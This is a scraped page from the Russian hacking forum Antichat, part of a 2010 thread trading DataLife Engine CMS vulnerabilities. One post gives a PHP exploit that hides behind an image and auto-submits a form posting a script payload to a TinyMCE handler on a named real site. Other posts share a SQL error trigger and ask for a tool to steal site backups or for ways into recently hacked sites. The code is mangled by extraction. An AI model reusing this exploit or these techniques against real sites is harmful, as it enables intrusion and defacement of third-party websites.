ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #151  
Старый 31.05.2010, 23:05
Аватар для slva2000
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию

Код:
http://forum.searchengines.ru/showthread.php?t=504108
Цитата:
Приветствую, уважаемые!

В последние несколько дней были взломаны сайты типа осетрина, amxсервер и т.д. мегакулхацкерами, думаю они на этом не остановятся, поэтому палю заплатку для новорожденной дыры - поставить права 765 на папку data.
детали не известны
 
Ответить с цитированием

  #152  
Старый 02.06.2010, 11:30
Аватар для MaZaHaKaT
MaZaHaKaT
Новичок
Регистрация: 14.05.2010
Сообщений: 2
Провел на форуме:
22300

Репутация: 5
Smile

Вот недавно нашёл багу.
В зависимости от чпу выполняем запрос
Например:
Код:
http://skripters.com/dle_haki/page/9999999999999999999/
Получаем:
Код:
MySQL Error! ------------------------  The Error returned was: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '7.3786976294838E+19,8' at line 1  Error Number: 1064
Я думаю найдёте применение
Неоткажусь от ++
 
Ответить с цитированием

  #153  
Старый 03.06.2010, 08:16
Аватар для EoGeneo
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861

Репутация: 5
Отправить сообщение для EoGeneo с помощью ICQ
По умолчанию

Я где то слышал что была софтина, которая ворует бэкапы - если он есть на сайте в папке backup. Не подскажите? сайтик нашел, папка бэкап есть имя бэкапа не могу подобрать
 
Ответить с цитированием

  #154  
Старый 04.06.2010, 11:37
Аватар для m00nster
m00nster
Новичок
Регистрация: 24.04.2010
Сообщений: 3
Провел на форуме:
17830

Репутация: 1
По умолчанию

Цитата:
Сообщение от EoGeneo  
Я где то слышал что была софтина, которая ворует бэкапы - если он есть на сайте в папке backup. Не подскажите? сайтик нашел, папка бэкап есть имя бэкапа не могу подобрать
держи
 
Ответить с цитированием

  #155  
Старый 05.06.2010, 01:40
Аватар для m00nster
m00nster
Новичок
Регистрация: 24.04.2010
Сообщений: 3
Провел на форуме:
17830

Репутация: 1
По умолчанию

Хм,кто нить тут отпишется как юзать багу с помощью "Tiny MCE редактор"
 
Ответить с цитированием

  #156  
Старый 05.06.2010, 11:28
Аватар для zebrum
zebrum
Новичок
Регистрация: 27.12.2009
Сообщений: 6
Провел на форуме:
26960

Репутация: 6
По умолчанию

Работает любой хтмл тег отосланный пост запросом на engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php

ТИПА ЭКСПЛОИТ
PHP код:
PHP код:
<?php 
$value 
urlencode("<script>alert('HACKED BY KZPROMO trololo');</script>"); 
if(
$_GET['unset'] == "time") unset($_COOKIE['time']); 
if(!isset(
$_COOKIE['time'])) 

setcookie("time",time(),time()+3600); 
echo <<<
HTML 
<html
<
head
</
head
<
body
<
center

<
form name="hack" action="https://gomel-sat.net/engine/editor/jscripts/tiny_mce/plugins/typograf/handler.php" method="post"
<
input type="text" name="text" value='$value' style="boder:none;FONT: 0px Tahoma; border:0px solid #FFFFFF;" border="0"
</
form

<
script
document.hack.submit(); 
</
script
</
body
</
html
HTML


else {  
header("Content-type: image/jpg"); 
$image imagecreatefromgif('smile.jpg'); 
imagegif($image); 
imagedestroy($image); 


?>
Автор: kzpromo
 
Ответить с цитированием

  #157  
Старый 05.06.2010, 16:46
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
Talking

Я подстолом. Сорри за оффтоп, но теперь уже и под пассивные XSS у нас сплойты пишут
 
Ответить с цитированием

  #158  
Старый 06.06.2010, 01:19
Аватар для valeros
valeros
Новичок
Регистрация: 22.08.2009
Сообщений: 1
Провел на форуме:
83171

Репутация: 0
По умолчанию

Есть ли способ увидеть имя БД в новых версиях DLE (8.2-8.5)?
 
Ответить с цитированием

  #159  
Старый 06.06.2010, 11:21
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Цитата:
Сообщение от Nightmarе  
Я подстолом. Сорри за оффтоп, но теперь уже и под пассивные XSS у нас сплойты пишут
Ну а если там только post, как иначе?
 
Ответить с цитированием

  #160  
Старый 07.06.2010, 03:10
Аватар для kickboxer
kickboxer
Познающий
Регистрация: 25.11.2009
Сообщений: 31
Провел на форуме:
100433

Репутация: 0
Отправить сообщение для kickboxer с помощью ICQ
По умолчанию

извиняюсь, если было, но может кто подскажет как взламывали недавно сайты, например zerx.ru .
Вот заплатка от взлома http://dle-news.ru/bags/v85/1037-provedenie-ataki-mezhsajtovogo-skriptinga-xss.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Сценарии/CMF/СMS 156 07.06.2010 05:01
Обзор уязвимостей в платных CMS ZAMUT Сценарии/CMF/СMS 56 15.04.2010 21:02
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Форумы 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ